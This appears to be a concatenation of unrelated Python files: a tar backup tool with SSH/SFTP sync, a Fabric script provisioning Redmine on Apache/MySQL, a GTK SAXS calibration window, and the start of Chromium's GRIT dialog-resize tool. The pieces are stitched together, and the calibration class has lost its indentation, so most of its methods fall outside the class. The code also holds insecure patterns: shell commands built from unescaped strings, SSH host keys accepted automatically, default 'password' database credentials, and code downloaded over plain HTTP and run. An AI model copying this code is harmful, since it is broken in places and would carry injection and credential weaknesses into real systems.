        file_path = os.path.join(args.src, filename)
        command = TAR_COMMAND_RESTORE.format(
            filename=file_path, destination_dir=args.dst, snap=snap
        )
        logger.debug("Shell command: {}".format(command))
        rc = subprocess.call(command, shell=True)
        if rc != 0:
            logger.error("Restore with args: {} error".format(args))
            return rc
    logger.info("Restore {} successed".format(args.name))
    return 0
def get_ssh_client(args):
    """Open a connected paramiko SSHClient using the --ssh-* options.

    Unknown host keys are accepted automatically (AutoAddPolicy).  When
    --ssh-key-rsa is given, that private key is used for authentication;
    otherwise paramiko's default mechanisms apply.
    """
    c = paramiko.SSHClient()
    c.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    key = None
    if args.ssh_key_rsa:
        key = paramiko.RSAKey.from_private_key_file(args.ssh_key_rsa)
    c.connect(hostname=args.ssh_host, username=args.ssh_user,
              port=args.ssh_port, pkey=key)
    return c
def upload_file(filename, args):
    """Upload new file to remote server through sftp.

    The local file is read from ``args.dst`` and written under the same
    basename in ``args.remote_dir``.
    """
    with get_ssh_client(args) as c:
        with c.open_sftp() as sftp:
            localpath = os.path.join(args.dst, filename)
            remotepath = os.path.join(args.remote_dir, filename)
            sftp.put(localpath, remotepath)
    logger.info("Upload file {} successed".format(filename))
def remote_delete(files, args):
    """Delete files on remote server.

    Issues a single ``rm -f`` over SSH covering every path in *files*
    (each resolved under ``args.remote_dir``).
    """
    with get_ssh_client(args) as c:
        files_for_args = ' '.join([
            os.path.join(args.remote_dir, filename)
            for filename in files
        ])
        command = "rm -f {}".format(files_for_args)
        stdin, stdout, stderr = c.exec_command(command)
        stdin.close()
    logger.info("Delete remote files {} successed".format(files))
def remote_find_files(client, args):
    """List backup-related files present in ``args.remote_dir``.

    Returns archive files first, then snapshot (.snar) files, each group
    sorted by name.
    """
    name = args.name
    command = "ls -1 {}".format(args.remote_dir)
    logger.debug("SSH command: {}".format(command))
    stdin, stdout, stderr = client.exec_command(command)
    stdin.close()
    res = stdout.read()
    logger.debug("SSH result: {}".format(res.splitlines()))
    # exec_command output is bytes; decode each listing line to str.
    files = [filename.decode('utf-8') for filename in res.splitlines()]
    arch_files = sorted(
        filename for filename in files if is_arch(name, filename)
    )
    snap_files = sorted(
        filename for filename in files if is_snap(name, filename)
    )
    return arch_files + snap_files
def download_files(args):
    """Download backup files from remote server through sftp.

    Any stale local copy in ``args.src`` is removed before each download.
    """
    with get_ssh_client(args) as c:
        found = remote_find_files(c, args)
        with c.open_sftp() as sftp:
            for filename in found:
                remotepath = os.path.join(args.remote_dir, filename)
                localpath = os.path.join(args.src, filename)
                silentremove(localpath)
                sftp.get(remotepath, localpath)
    logger.info("Download backup files successed")
def sync_remote(args):
    """Compare files in local and remote, upload if not found.

    Both archive and snapshot files are considered; anything present
    locally (in ``args.dst``) but missing remotely is uploaded.
    """
    with get_ssh_client(args) as c:
        remote_found = remote_find_files(c, args)
        local_found = find_files(args.name, args.dst)
        local_snap_found = find_snap_files(args.name, args.dst)
        for local_filename in local_found + local_snap_found:
            if local_filename not in remote_found:
                logger.info("Upload missing file {}".format(local_filename))
                upload_file(local_filename, args)
# Script entry point.
if __name__ == '__main__':
    main()
| |
import os
from fabric.api import task, run, env, settings, cd
from fabtools.vagrant import ssh_config, _settings_dict
import fabtools
from fabtools import require
from fabric.contrib import files
@task
def vagrant(name=''):
    """Point the fabric environment at a local Vagrant VM.

    Copies the VM's ssh-config into ``env``, forces the root user, and
    seeds the MySQL credentials and Redmine version used by install().
    """
    config = ssh_config(name)
    extra_args = _settings_dict(config)
    env.update(extra_args)
    env['user'] = 'root'
    env['mysql_user'] = 'root'
    env['mysql_password'] = os.environ.get('MYSQL_PASSWORD', 'password')
    env['redmine_version'] = 'trunk'
    # env['redmine_version'] = 'http://rubyforge.org/frs/download.php/76771/redmine-2.2.3.tar.gz'
def _add_user(*args, **kwargs):
    """Create a system user and give it root's authorized SSH keys.

    All arguments are forwarded to ``require.user``; the user name is taken
    from ``name=`` or, failing that, the first positional argument.
    """
    require.user(*args, **kwargs)
    if 'name' not in kwargs:
        user = args[0]
    else:
        user = kwargs['name']
    # Seed the new account with root's authorized_keys so the same key that
    # reaches root can log in as this user too.
    if not fabtools.files.is_file('/home/%s/.ssh/authorized_keys' % user):
        run('mkdir -p /home/%s/.ssh/' % user)
        run('cp /root/.ssh/authorized_keys /home/%s/.ssh/' % user)
        run('chown %(user)s:%(user)s /home/%(user)s/.ssh/ -R' % {'user': user})
@task
def upgrade():
    """Refresh the apt package index and upgrade all installed packages."""
    fabtools.deb.update_index()
    fabtools.deb.upgrade()
@task
def install():
    """Provision a complete Redmine stack on the target host.

    Installs system packages, MySQL, a user-local rubygems/bundler setup
    for a dedicated ``redmine`` user, the Redmine application itself
    (trunk or a release tarball depending on env['redmine_version']),
    thin app servers under supervisor, and an Apache SSL reverse proxy.
    """
    env['redmine_version'] = env.get('redmine_version', 'http://rubyforge.org/frs/download.php/76771/redmine-2.2.3.tar.gz')
    require.deb.packages(['sudo'])
    fabtools.require.system.locale('fr_FR.UTF-8')
    fabtools.deb.update_index()
    env['mysql_user'] = 'root'
    env['mysql_password'] = os.environ.get('MYSQL_PASSWORD', 'password')
    # Preseed debconf so the mysql-server install is non-interactive.
    fabtools.deb.preseed_package('mysql-server', {
        'mysql-server/root_password': ('password', env['mysql_password']),
        'mysql-server/root_password_again': ('password', env['mysql_password']),
    })
    require.deb.packages([
        'build-essential',
        'devscripts',
        'locales',
        'apache2',
        'mysql-server',
        'mysql-client',
        'vim',
        'mc',
        'curl',
        'wget',
        'ruby1.8',
        'ruby1.8-dev',
        'supervisor',
        'python-pip',
        'python-dev',
        'subversion',
        'libxslt1-dev',
        'libxml2-dev',
        'libmysqld-dev',
        'libmagick++-dev',
        'libsqlite3-dev'
    ])
    # The distribution rubygems packages conflict with the manual
    # rubygems 2.0.3 install performed below.
    require.deb.nopackages([
        'rubygems',
        'rubygems1.8'
    ])
    _add_user(
        name='redmine',
        password=None,
        shell='/bin/bash'
    )
    require.mysql.user('redmine', 'password')
    require.mysql.database('redmine', owner='redmine')
    # Everything below down to the rake tasks runs as the redmine user:
    # user-local gem home, rubygems/bundler bootstrap, app checkout.
    with settings(user='redmine'):
        run('mkdir -p ~/gem')
        require.file(
            '/home/redmine/ruby-env',
            contents="""\
export GEM_HOME=~/gem
export RUBYLIB=~/lib
export PATH=~/bin:$GEM_HOME/bin:$PATH
export RAILS_ENV=production
"""
        )
        files.append('/home/redmine/.profile', 'source ~/ruby-env')
        # Bootstrap rubygems into the user's home (no system install).
        run('wget http://production.cf.rubygems.org/rubygems/rubygems-2.0.3.tgz')
        run('tar xzf rubygems-2.0.3.tgz')
        run('cd rubygems-2.0.3; ruby setup.rb --prefix=~ --no-format-executable')
        run('rm -rf rubygems*')
        run('gem install bundler')
        # Fetch Redmine: svn trunk, or a release tarball given as a URL.
        if env['redmine_version'] == 'trunk':
            run('svn co http://svn.redmine.org/redmine/trunk redmine-trunk')
            run('mv redmine-trunk redmine')
        else:
            run('wget %s' % env['redmine_version'])
            run('tar xzf redmine-*')
            run('mv redmine-* redmine')
        with cd('/home/redmine/redmine/'):
            require.file(
                '/home/redmine/redmine/config/database.yml',
                """\
production:
  adapter: mysql2
  database: redmine
  host: localhost
  socket: /var/run/mysqld/mysqld.sock
  username: redmine
  password: password
  encoding: utf8
  reconnect: true
test:
  adapter: sqlite3
  database: db/redmine.db
"""
            )
            require.file(
                '/home/redmine/redmine/config/thin.conf',
                """\
daemonize: false
chdir: /home/redmine/redmine
pid: tmp/pids/thin.pid
log: log/thin.log
prefix: /
environment: production
"""
            )
            run('chmod 0600 config/database.yml')
            files.append('/home/redmine/redmine/Gemfile', 'gem "thin"')
            run('bundle install --without sqlite postgresql')
            run('rake generate_secret_token')
            run('rake db:migrate')
            run('rake redmine:load_default_data REDMINE_LANG=en')
    # Two thin instances (ports 3000/3001) supervised by supervisord.
    require.file(
        '/etc/supervisor/conf.d/redmine.conf',
        """\
[program:redmine]
process_name=%(program_name)s_%(process_num)02d
directory=/home/redmine/redmine/
user=redmine
numprocs=2
autostart=true
autorestart=true
startsecs=10
redirect_stderr=true
stdout_logfile=/var/log/supervisor/redmine-thin.log
command=/home/redmine/gem/bin/thin -C config/thin.conf -p 30%(process_num)02d start
environment=GEM_HOME='/home/redmine/gem',RUBYLIB='/home/redmine/lib',RAILS_ENV='production'
"""
    )
    run('supervisorctl reload')
    # Apache: force HTTPS and balance between the two thin backends.
    run('a2dissite default')
    require.file(
        '/etc/apache2/sites-available/redmine.conf',
        """\
<VirtualHost *:80>
    ServerName redmine.fifiant.com
    Redirect / https://redmine.fifiant.com/
</VirtualHost>
<VirtualHost *:443>
    ServerName redmine.fifiant.com
    DocumentRoot /home/redmine/redmine/public/
    SSLEngine On
    SSLCertificateFile /etc/ssl/localcerts/apache.pem
    SSLCertificateKeyFile /etc/ssl/localcerts/apache.key
    <Proxy *>
        Order allow,deny
        Allow from all
    </Proxy>
    ProxyPreserveHost On
    ProxyTimeout 30
    <Proxy balancer://redmine_app>
        BalancerMember http://localhost:3000 max=1
        BalancerMember http://localhost:3001 max=1
        ProxySet maxattempts=3
        Allow from all
    </Proxy>
    RewriteEngine On
    RewriteCond %{LA-U:REQUEST_FILENAME} !-f
    RewriteRule ^(.*) balancer://redmine_app/$1 [P,L]
    RequestHeader set X_FORWARDED_PROTO 'https'
</VirtualHost>
""")
    run('a2ensite redmine.conf')
    run('a2enmod proxy')
    run('a2enmod proxy_http')
    run('a2enmod rewrite')
    run('a2enmod headers')
    run('a2enmod ssl')
    run('a2enmod proxy_balancer')
    # Generate a self-signed certificate once, if none is present yet.
    if not fabtools.files.is_file('/etc/ssl/localcerts/apache.key'):
        require.file(
            '/tmp/openssl.cnf',
            """\
[ req ]
prompt = no
distinguished_name = req_distinguished_name
[ req_distinguished_name ]
C = FR
ST = French
L = Pars
O = Example
OU = Org Unit Name
CN = Common Name
emailAddress = contact@example.com
"""
        )
        run('mkdir -p /etc/ssl/localcerts')
        run('openssl req -config /tmp/openssl.cnf -new -x509 -days 365 -nodes -out /etc/ssl/localcerts/apache.pem -keyout /etc/ssl/localcerts/apache.key')
        run('rm /tmp/openssl.cnf')
    run('pip install mercurial')
    run('/etc/init.d/apache2 force-reload')
| |
import logging
import traceback
from typing import Union, Tuple
import numpy as np
from gi.repository import Gtk
from matplotlib.backends.backend_gtk3 import NavigationToolbar2GTK3
from matplotlib.backends.backend_gtk3agg import FigureCanvasGTK3Agg
from matplotlib.figure import Figure
from matplotlib.widgets import Cursor
from sastool.classes2 import Curve
from sastool.io.credo_cct import Exposure
from sastool.misc.basicfit import findpeak_single
from sastool.misc.easylsq import nonlinear_odr
from sastool.misc.errorvalue import ErrorValue
from sastool.utils2d.centering import findbeam_radialpeak, findbeam_powerlaw
from ..core.exposureloader import ExposureLoader
from ..core.functions import update_comboboxtext_choices, savefiguretoclipboard
from ..core.plotcurve import PlotCurveWidget
from ..core.plotimage import PlotImageWidget
from ..core.toolwindow import ToolWindow, error_message
logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO)
def qfrompix(pix, pixelsize, beampos, alpha, wavelength, dist):
    """Convert a detector pixel coordinate into the scattering variable q.

    The pixel offset from the beam position is projected with the detector
    tilt angle ``alpha`` (radians) into components parallel and
    perpendicular to the beam before the scattering angle is taken.
    """
    offset = pixelsize / dist * (pix - beampos)
    adjacent = 1 + offset * np.cos(alpha)
    opposite = offset * np.sin(alpha)
    half_twotheta = 0.5 * np.arctan2(opposite, adjacent)
    return 4 * np.pi * np.sin(half_twotheta) / wavelength
class Calibration(ToolWindow):
    def __init__(self, *args, **kwargs):
        # Declare all widget/state attributes before calling the base
        # __init__, which triggers init_gui() to populate them.
        # NOTE(review): _cursor/_curve/_dist appear to hold picking and
        # fitting state for methods outside this view — confirm.
        self._cursor = None
        self._exposure = None
        self._curve = None
        self._manualpickingconnection = None
        self.plot2d = None
        self.plot1d = None
        self.figpairs = None
        self.figpairscanvas = None
        self.figpairstoolbox = None
        self.figpairsaxes = None
        self.exposureloader = None
        self._dist = None
        super().__init__(*args, **kwargs)
def init_gui(self, *args, **kwargs):
self.plot2d = PlotImageWidget()
self.builder.get_object('figbox_2d').pack_start(self.plot2d.widget, True, True, 0)
self.plot1d = PlotCurveWidget()
self.builder.get_object('figbox_1d').pack_start(self.plot1d.widget, True, True, 0)
self.figpairs = Figure(tight_layout=True)
self.figpairscanvas = FigureCanvasGTK3Agg(self.figpairs)
self.builder.get_object('figbox_distcalib').pack_start(self.figpairscanvas, True, True, 0)
self.figpairstoolbox = NavigationToolbar2GTK3(self.figpairscanvas, self.widget)
b = Gtk.ToolButton(icon_widget=Gtk.Image.new_from_icon_name('edit-copy', Gtk.IconSize.LARGE_TOOLBAR),
label='Copy')
b.set_tooltip_text('Copy the image to the clipboard')
b.connect('clicked', lambda b_, f=self.figpairs: savefiguretoclipboard(f))
self.figpairstoolbox.insert(b, 9)
self.builder.get_object('figbox_distcalib').pack_start(self.figpairstoolbox, False, True, 0)
self.figpairsaxes = self.figpairs.add_subplot(1, 1, 1)
logger.debug('Initializing EL')
self.exposureloader = ExposureLoader(self.instrument)
logger.debug('EL ready. Packing.')
self.builder.get_object('loadfile_expander').add(self.exposureloader)
logger.debug('EL packed. Connecting.')
self.exposureloader.connect('open', self.on_loadexposure)
self.exposureloader.connect('error', self.on_loadexposure_error)
logger.debug('Connected.')
tv = self.builder.get_object('pairview')
tc = Gtk.TreeViewColumn('Uncalibrated', Gtk.CellRendererText(), text=0)
tv.append_column(tc)
tc = Gtk.TreeViewColumn('Calibrated', Gtk.CellRendererText(), text=1)
tv.append_column(tc)
csel = self.builder.get_object('calibrant_selector')
csel.remove_all()
for calibrant in sorted(self.instrument.config['calibrants']):
csel.append_text(calibrant)
csel.set_active(0)
self.on_calibrant_selector_changed(csel)
def on_calibrant_selector_changed(self, csel: Gtk.ComboBoxText):
update_comboboxtext_choices(
self.builder.get_object('peak_selector'),
sorted(self.instrument.config['calibrants'][csel.get_active_text()]))
def on_peak_selector_changed(self, psel: Gtk.ComboBoxText):
calibrant = self.builder.get_object('calibrant_selector').get_active_text()
if calibrant is None:
return
peak = psel.get_active_text()
if peak is None:
return
self.builder.get_object('calval_adjustment').set_value(
self.instrument.config['calibrants'][calibrant][peak]['val'])
self.builder.get_object('calerr_adjustment').set_value(
self.instrument.config['calibrants'][calibrant][peak]['err'])
logger.debug('Set from calibrant.')
def on_addpair(self, button: Gtk.Button):
model = self.builder.get_object('pairstore')
calval = self.builder.get_object('calval_adjustment').get_value()
calerr = self.builder.get_object('calerr_adjustment').get_value()
uncalval = self.builder.get_object('uncalval_adjustment').get_value()
uncalerr = self.builder.get_object('uncalerr_adjustment').get_value()
cal = ErrorValue(calval, calerr)
uncal = ErrorValue(uncalval, uncalerr)
model.append((uncal.tostring(plusminus=' \u00b1 '), cal.tostring(plusminus=' \u00b1 '), uncalval, uncalerr,
calval, calerr))
self.replot_calpairs()
def replot_calpairs(self):
uncalval = []
uncalerr = []
calval = []
calerr = []
for row in self.builder.get_object('pairstore'):
uncalval.append(row[2])
uncalerr.append(row[3])
calval.append(row[4])
calerr.append(row[5])
self.figpairsaxes.clear()
self.figpairsaxes.errorbar(uncalval, calval, calerr, uncalerr, '.')
self.figpairsaxes.set_xlabel('Uncalibrated (pixel)')
self.figpairsaxes.set_ylabel('Calibrated (nm$^{-1}$)')
self.figpairscanvas.draw()
self.do_getdistance()
def on_removepair(self, button: Gtk.Button):
model, it = self.builder.get_object('pairview').get_selection().get_selected()
if it is None:
return
model.remove(it)
self.replot_calpairs()
def on_exportpairs(self, button: Gtk.Button):
pass
def on_overridemask_toggled(self, checkbutton: Gtk.CheckButton):
self.builder.get_object('maskchooser').set_sensitive(checkbutton.get_active())
def on_fitlorentz(self, button):
self.do_fit('Lorentz')
def on_fitgauss(self, button):
self.do_fit('Gauss')
def do_getdistance(self):
model = self.builder.get_object('pairstore')
uncalval = np.array([row[2] for row in model])
uncalerr = np.array([row[3] for row in model])
calval = np.array([row[4] for row in model])
calerr = np.array([row[5] for row in model])
logger.debug('Uncalval: ' + str(uncalval))
logger.debug('Uncalerr: ' + str(uncalerr))
logger.debug('Calval: ' + str(calval))
logger.debug('Calerr: ' + str(calerr))
assert isinstance(self._exposure, Exposure)
assert self._exposure.header.pixelsizex == self._exposure.header.pixelsizey
if len(uncalval) > 1:
def fitfunc(pix_: np.ndarray, dist: float):
return qfrompix(pix_, pixelsize=self._exposure.header.pixelsizex,
beampos=0, alpha=np.pi * 0.5,
wavelength=self._exposure.header.wavelength,
dist=dist)
self._dist, stat = nonlinear_odr(uncalval, calval, uncalerr, calerr, fitfunc, [100])
x = np.linspace(uncalval.min(), uncalval.max(), len(uncalval) * 100)
self.figpairsaxes.plot(x, fitfunc(x, self._dist.val), 'r-')
elif len(uncalval) == 1:
q = ErrorValue(float(calval[0]), float(calerr[0]))
pix = ErrorValue(float(uncalval[0]), float(uncalerr[0]))
wl = ErrorValue(
self._exposure.header.wavelength,
0) # wavelength error is not considered here:
# it has already been considered in the pixel value (peak position)
pixsize = self._exposure.header.pixelsizex
self._dist = (pix * pixsize) / (2.0 * (wl * q / 4.0 / np.pi).arcsin()).tan()
else:
self._dist = None
self.builder.get_object('distance_label').set_text('--')
self.builder.get_object('savedistance_button').set_sensitive(True)
return
self.builder.get_object('distance_label').set_text(self._dist.tostring(plusminus=' \u00b1 ') + ' mm')
self.builder.get_object('savedistance_button').set_sensitive(True)
self.figpairscanvas.draw()
def do_fit(self, curvetype: str):
xmin, xmax = self.plot1d.get_zoom_xrange()
assert isinstance(self._curve, Curve)
try:
x = self._curve.q
y = self._curve.Intensity
idx = (x >= xmin) & (x <= xmax)
x = x[idx]
y = y[idx]
dy = self._curve.Error[idx]
pos, hwhm, baseline, ampl = findpeak_single(x, y, dy)
x_ = np.linspace(x.min(), x.max(), len(x) * 10)
assert isinstance(x_, np.ndarray)
if curvetype == 'Gauss':
y_ = ampl * np.exp(-0.5 * (x_ - pos) ** 2 / hwhm ** 2) + baseline
elif curvetype == 'Lorentz':
y_ = ampl * hwhm ** 2 / (hwhm ** 2 + (pos - x_) ** 2) + baseline
else:
raise ValueError(curvetype)
self.builder.get_object('uncalval_adjustment').set_value(pos.val)
self.builder.get_object('uncalerr_adjustment').set_value(pos.err)
self.plot1d.axes.plot(x_, y_, 'r-')
self.plot1d.axes.text(pos.val, ampl.val + baseline.val, pos.tostring(plusminus=' \u00b1 '), ha='center',
va='bottom')
self.plot1d.canvas.draw()
except Exception as exc:
error_message(self.widget, 'Error while fitting', str(exc) + traceback.format_exc())
def on_manualposition_selected(self, event):
if (event.button == 1) and (event.inaxes == self.plot2d.axis):
self.plot2d.canvas.mpl_disconnect(self._manualpickingconnection)
self._manualpickingconnection = None
self.on_findcenter((event.ydata, event.xdata))
self.set_sensitive(True)
self._cursor.clear(event)
self._cursor = None
stack = self.builder.get_object('plotstack')
stack.child_set_property(stack.get_child_by_name('plot2d'), 'needs-attention', False)
self.plot2d.replot()
def on_findcenter(self, button: Union[Tuple[float, float], Gtk.Button]):
if isinstance(button, tuple):
posy, posx = button
else:
assert isinstance(button, Gtk.Button)
method = self.builder.get_object('centeringmethod_selector').get_active_text()
if method == 'Manual (click)':
stack = self.builder.get_object('plotstack')
stack.child_set_property(stack.get_child_by_name('plot2d'), 'needs-attention', True)
self._cursor = Cursor(self.plot2d.axis, useblit=False, color='white', lw=1)
self._manualpickingconnection = self.plot2d.canvas.mpl_connect(
'button_press_event', self.on_manualposition_selected)
self.set_sensitive(False, 'Manual positioning active', ['input_box', 'close_button'])
return
elif method == 'Peak amplitude':
assert isinstance(self._exposure, Exposure)
xmin, xmax = self.plot1d.get_zoom_xrange()
logger.debug('Peak amplitude method: xmin: {:f}. xmax: {:f}. Original beampos: {}, {}.'.format(
xmin, xmax, self._exposure.header.beamcenterx, self._exposure.header.beamcentery))
posy, posx = findbeam_radialpeak(
self._exposure.intensity, [self._exposure.header.beamcentery, self._exposure.header.beamcenterx],
self._exposure.mask, xmin, xmax, drive_by='amplitude')
elif method == 'Peak width':
assert isinstance(self._exposure, Exposure)
xmin, xmax = self.plot1d.get_zoom_xrange()
posy, posx = findbeam_radialpeak(
self._exposure.intensity, [self._exposure.header.beamcentery, self._exposure.header.beamcenterx],
self._exposure.mask, xmin, xmax, drive_by='hwhm')
elif method == 'Power-law goodness of fit':
assert isinstance(self._exposure, Exposure)
xmin, xmax = self.plot1d.get_zoom_xrange()
posy, posx = findbeam_powerlaw(self._exposure.intensity, [self._exposure.header.beamcentery,
self._exposure.header.beamcenterx],
self._exposure.mask, xmin, xmax)
else:
raise ValueError(method)
assert isinstance(self._exposure, Exposure)
self._exposure.header.beamcenterx = posx
self._exposure.header.beamcentery = posy
self.builder.get_object('center_label').set_text('({}, {})'.format(posx, posy))
self.plot2d.set_beampos(posx, posy)
self.radial_average()
self.builder.get_object('savecenter_button').set_sensitive(True)
def on_savecenter(self, button):
assert isinstance(self._exposure, Exposure)
self.instrument.config['geometry']['beamposx'] = self._exposure.header.beamcentery
self.instrument.config['geometry']['beamposy'] = self._exposure.header.beamcenterx
self.instrument.save_state()
logger.info('Beam center updated to ({}, {}) [(x, y) or (col, row)].'.format(
self.instrument.config['geometry']['beamposy'],
self.instrument.config['geometry']['beamposx']))
self.instrument.save_state()
button.set_sensitive(False)
def on_replot(self, button):
return self.radial_average()
def on_savedistance(self, button):
self.instrument.config['geometry']['dist_sample_det'] = self._dist.val
self.instrument.config['geometry']['dist_sample_det.err'] = self._dist.err
logger.info('Sample-to-detector distance updated to {:.4f} \u00b1 {:.4f} mm.'.format(
self.instrument.config['geometry']['dist_sample_det'],
self.instrument.config['geometry']['dist_sample_det.err']))
self.instrument.save_state()
button.set_sensitive(False)
def radial_average(self):
assert isinstance(self._exposure, Exposure)
self._curve = self._exposure.radial_average(pixel=True)
assert isinstance(self._curve, Curve)
try:
sampletitle = self._exposure.header.title
except KeyError:
sampletitle = 'no sample'
self.plot1d.addcurve(
self._curve.q, self._curve.Intensity, self._curve.qError, self._curve.Error,
'FSN #{:d}: {}. Beam: ({}, {})'.format(
self._exposure.header.fsn, sampletitle,
self._exposure.header.beamcenterx,
self._exposure.header.beamcentery), 'pixel')
def on_loadexposure(self, exposureloader, im: Exposure):
self._exposure = im
with self.plot2d.inhibit_replot:
self.plot2d.set_beampos(im.header.beamcenterx, im.header.beamcentery)
self.plot2d.set_wavelength(im.header.wavelength)
self.plot2d.set_distance(im.header.distance)
assert im.header.pixelsizex == im.header.pixelsizey
self.plot2d.set_pixelsize(im.header.pixelsizex)
self.plot2d.set_mask(im.mask)
self.plot2d.set_image(im.intensity)
self.builder.get_object('center_label').set_text('({}, {})'.format(
im.header.beamcenterx,
im.header.beamcentery))
self.radial_average()
def on_loadexposure_error(self, exposureloader, message):
self.error_message(message)
| |
#!/usr/bin/python2.4
# Copyright (c) 2006-2008 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
'''The 'grit resize' tool.
'''
import getopt
import os
import types
from grit.tool import interface
from grit.tool import build
from grit import grd_reader
from grit import pseudo
from grit import util
from grit.node import include
from grit.node import structure
from grit.node import message
from grit.format import rc_header
# Template for the .vcproj file, with a couple of [[REPLACEABLE]] parts.
PROJECT_TEMPLATE = '''\
<?xml version="1.0" encoding="Windows-1252"?>
<VisualStudioProject
ProjectType="Visual C++"
Version="7.10"
Name="[[DIALOG_NAME]]"
ProjectGUID="[[PROJECT_GUID]]"
Keyword="Win32Proj">
<Platforms>
<Platform
Name="Win32"/>
</Platforms>
<Configurations>
<Configuration
Name="Debug|Win32"
OutputDirectory="Debug"
IntermediateDirectory="Debug"
ConfigurationType="1"
CharacterSet="2">
</Configuration>
</Configurations>
<References>
</References>
<Files>
<Filter
Name="Resource Files"
Filter="rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx"
UniqueIdentifier="{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}">
<File
RelativePath=".\[[DIALOG_NAME]].rc">
</File>
</Filter>
</Files>
<Globals>
</Globals>
</VisualStudioProject>'''
# Template for the .rc file with a couple of [[REPLACEABLE]] parts.
# TODO(joi) Improve this (and the resource.h template) to allow saving and then
# reopening of the RC file in Visual Studio. Currently you can only open it
# once and change it, then after you close it you won't be able to reopen it.
RC_TEMPLATE = '''\
// Copyright (c) Google Inc. 2005
// All rights reserved.
// This file is automatically generated by GRIT and intended for editing
// the layout of the dialogs contained in it. Do not edit anything but the
// dialogs. Any changes made to translateable portions of the dialogs will
// be ignored by GRIT.
#include "resource.h"
#include <winres.h>
#include <winresrc.h>
LANGUAGE LANG_NEUTRAL, SUBLANG_NEUTRAL
#pragma code_page([[CODEPAGE_NUM]])
[[INCLUDES]]
[[DIALOGS]]
'''
# Template for the resource.h file with a couple of [[REPLACEABLE]] parts.
HEADER_TEMPLATE = '''\
// Copyright (c) Google Inc. 2005
// All rights reserved.
// This file is automatically generated by GRIT. Do not edit.
#pragma once
// Edit commands
#define ID_EDIT_CLEAR 0xE120
#define ID_EDIT_CLEAR_ALL 0xE121
#define ID_EDIT_COPY 0xE122
#define ID_EDIT_CUT 0xE123
#define ID_EDIT_FIND 0xE124
#define ID_EDIT_PASTE 0xE125
#define ID_EDIT_PASTE_LINK 0xE126
#define ID_EDIT_PASTE_SPECIAL 0xE127
#define ID_EDIT_REPEAT 0xE128
#define ID_EDIT_REPLACE 0xE129
#define ID_EDIT_SELECT_ALL 0xE12A
#define ID_EDIT_UNDO 0xE12B
#define ID_EDIT_REDO 0xE12C
[[DEFINES]]
'''
class ResizeDialog(interface.Tool):
  '''Generates an RC file, header and Visual Studio project that you can use
with Visual Studio's GUI resource editor to modify the layout of dialogs for
the language of your choice.  You then use the RC file, after you resize the
dialog, for the language or languages of your choice, using the <skeleton> child
of the <structure> node for the dialog.  The translatable bits of the dialog
will be ignored when you use the <skeleton> node (GRIT will instead use the
translatable bits from the original dialog) but the layout changes you make
will be used.  Note that your layout changes must preserve the order of the
translatable elements in the RC file.

Usage: grit resize [-f BASEFOLDER] [-l LANG] [-e RCENCODING] DIALOGID*

Arguments:
  DIALOGID        The 'name' attribute of a dialog to output for resizing.  Zero
                  or more of these parameters can be used.  If none are
                  specified, all dialogs from the input .grd file are output.

Options:

  -f BASEFOLDER   The project will be created in a subfolder of BASEFOLDER.
                  The name of the subfolder will be the first DIALOGID you
                  specify.  Defaults to '.'

  -l LANG         Specifies that the RC file should contain a dialog translated
                  into the language LANG.  The default is a cp1252-representable
                  pseudotranslation, because Visual Studio's GUI RC editor only
                  supports single-byte encodings.

  -c CODEPAGE     Code page number to indicate to the RC compiler the encoding
                  of the RC file, default is something reasonable for the
                  language you selected (but this does not work for every single
                  language).  See details on codepages below.  NOTE that you do
                  not need to specify the codepage unless the tool complains
                  that it's not sure which codepage to use.  See the following
                  page for codepage numbers supported by Windows:
                  http://www.microsoft.com/globaldev/reference/wincp.mspx

  -D NAME[=VAL]   Specify a C-preprocessor-like define NAME with optional
                  value VAL (defaults to 1) which will be used to control
                  conditional inclusion of resources.

IMPORTANT NOTE: For now, the tool outputs a UTF-8 encoded file for any language
that can not be represented in cp1252 (i.e. anything other than Western
European languages).  You will need to open this file in a text editor and
save it using the codepage indicated in the #pragma code_page(XXXX) command
near the top of the file, before you open it in Visual Studio.
'''
  # TODO(joi) It would be cool to have this tool note the Perforce revision
  # of the original RC file somewhere, such that the <skeleton> node could warn
  # if the original RC file gets updated without the skeleton file being updated.
  # TODO(joi) Would be cool to have option to add the files to Perforce

  def __init__(self):
    # Defaults; -l / -c / -D / -f options in Run() override these.
    self.lang = pseudo.PSEUDO_LANG
    self.defines = {}
    self.base_folder = '.'
    self.codepage_number = 1252
    # Tracks whether -c was given, so SetLanguage() knows not to clobber
    # an explicitly requested codepage.
    self.codepage_number_specified_explicitly = False

  def SetLanguage(self, lang):
    '''Sets the language code to output things in.
    '''
    self.lang = lang
    if not self.codepage_number_specified_explicitly:
      self.codepage_number = util.LanguageToCodepage(lang)

  def GetEncoding(self):
    '''Returns the Python codec name corresponding to self.codepage_number.'''
    if self.codepage_number == 1200:
      return 'utf_16'
    if self.codepage_number == 65001:
      return 'utf_8'
    return 'cp%d' % self.codepage_number

  def ShortDescription(self):
    return 'Generate a file where you can resize a given dialog.'

  def Run(self, opts, args):
    '''Parses tool-specific options, loads and gathers the resource tree,
    then delegates to Process() for the listed (or all) dialogs.'''
    self.SetOptions(opts)

    own_opts, args = getopt.getopt(args, 'l:f:c:D:')
    for key, val in own_opts:
      if key == '-l':
        self.SetLanguage(val)
      if key == '-f':
        self.base_folder = val
      if key == '-c':
        self.codepage_number = int(val)
        self.codepage_number_specified_explicitly = True
      if key == '-D':
        name, val = build.ParseDefine(val)
        self.defines[name] = val

    res_tree = grd_reader.Parse(opts.input, debug=opts.extra_verbose)
    res_tree.OnlyTheseTranslations([self.lang])
    res_tree.RunGatherers(True)

    # Dialog IDs are either explicitly listed, or we output all dialogs from the
    # .grd file
    dialog_ids = args
    if not len(dialog_ids):
      for node in res_tree:
        if node.name == 'structure' and node.attrs['type'] == 'dialog':
          dialog_ids.append(node.attrs['name'])

    self.Process(res_tree, dialog_ids)

  def Process(self, grd, dialog_ids):
    '''Outputs an RC file and header file for the dialog 'dialog_id' stored in
    resource tree 'grd', to self.base_folder, as discussed in this class's
    documentation.

    Arguments:
      grd: grd = grd_reader.Parse(...); grd.RunGatherers()
      dialog_ids: ['IDD_MYDIALOG', 'IDD_OTHERDIALOG']
    '''
    grd.SetOutputContext(self.lang, self.defines)

    # The project (and its folder) is named after the first dialog ID.
    project_name = dialog_ids[0]

